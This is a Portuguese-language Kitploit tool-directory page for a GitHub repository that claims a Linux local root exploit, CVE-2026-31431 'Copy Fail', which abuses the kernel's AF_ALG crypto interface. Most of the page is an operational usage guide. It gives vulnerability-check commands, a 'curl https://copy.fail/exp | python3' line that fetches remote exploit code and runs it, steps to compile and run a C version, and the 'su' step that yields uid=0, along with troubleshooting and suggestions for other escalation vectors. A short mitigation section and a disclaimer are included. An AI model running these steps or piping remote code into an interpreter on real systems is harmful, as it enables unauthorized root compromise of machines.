Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Copy-Fail-Exploit-CVE-2026-31431 — A maioria dos LPEs Linux precisa de uma janela de corrida ou de um offset específico do kernel. Copy Fail é uma falha lógica de linha reta, não precisa de nenhum dos dois. O mesmo script Python de 732 bytes (ou .c elf) dá root em todas as distribuições Linux lançadas desde 2017. | Kitploit
Ferramentas/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoExploração de Binários
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

A maioria dos LPEs Linux precisa de uma janela de corrida ou de um offset específico do kernel. Copy Fail é uma falha lógica de linha reta, não precisa de nenhum dos dois. O mesmo script Python de 732 bytes (ou .c elf) dá root em todas as distribuições Linux lançadas desde 2017.

Ver Repositório
1092318há 5 mesesRevisado pelo Kitploit

Copy Fail (CVE-2026-31431) – Guia de Uso do Exploit

⚠️ Aviso Legal

Este conteúdo é apenas para fins educacionais e de testes de segurança autorizados. NÃO execute isso em sistemas sem permissão explícita.


📌 Visão Geral

Copy Fail (CVE-2026-31431) é uma vulnerabilidade de Escalação Local de Privilégios (LPE) no Linux que afeta a API de criptografia do kernel via AF_ALG.

Ela permite que um usuário sem privilégios sobrescreva dados do cache de páginas de um binário SUID (ex.: /usr/bin/su) e obtenha acesso root.


🧠 Requisitos

Requisitos do Sistema

  • Kernel Linux (vulnerável – depende do status do patch)
  • AF_ALG habilitado
  • Módulo algif_aead carregado

Requisitos do Exploit em Python

  • Python 3.10+
  • Suporte para:
    • os.splice
    • socket(AF_ALG)

🔍 Verificando a Vulnerabilidade

uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Indicadores esperados:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead carregado

🐍 Executando o Exploit em Python

1. Executar diretamente

python3 copy_fail_exp.py

2. Ou via curl (se hospedado remotamente)

curl https://copy.fail/exp | python3

3. Acionar shell root

su
id

Resultado esperado:

uid=0(root)

⚠️ Problemas Comuns (Python)

❌ Erro: os.splice not found

Causa:

  • Versão do Python < 3.10
  • Build restrito

Solução:

  • Use um binário Python mais recente
  • Envie um interpretador Python estático

⚙️ Compilando a Versão em C

1. Compilar

gcc copy_fail_exp.c -o copy_fail

2. Tornar executável

chmod +x copy_fail

3. Executar o exploit

./copy_fail
su

⚠️ Problemas Comuns (C)

❌ O exploit executa, mas não obtém root

Possíveis causas:

  • Kernel corrigido
  • Offsets incorretos
  • Incompatibilidade de ambiente

❌ Erros de compilação

Instale as ferramentas necessárias:

apt update && apt install build-essential

🧪 Solução de Problemas

Verificar se o sistema está corrigido

dmesg | grep -i alg

Verificar o módulo

lsmod | grep algif_aead

🛡️ Mitigação

Desabilitar o módulo vulnerável

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Aplicar patch do kernel

Atualize seu sistema:

apt update && apt upgrade

📌 Notas

  • O exploit modifica apenas o cache de páginas (não persistente)
  • Requer acesso local
  • Não explorável remotamente por padrão

🧠 Consideração Final

Se o exploit falhar, considere:

  • Kernel já corrigido
  • Restrições de ambiente
  • Vetores alternativos de escalada de privilégios (SUID, capabilities, má configuração do sudo)

📚 Referências

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 Notas do Autor

Use este exploit com responsabilidade apenas em laboratórios, CTFs e testes de penetração autorizados.

Baixar ferramenta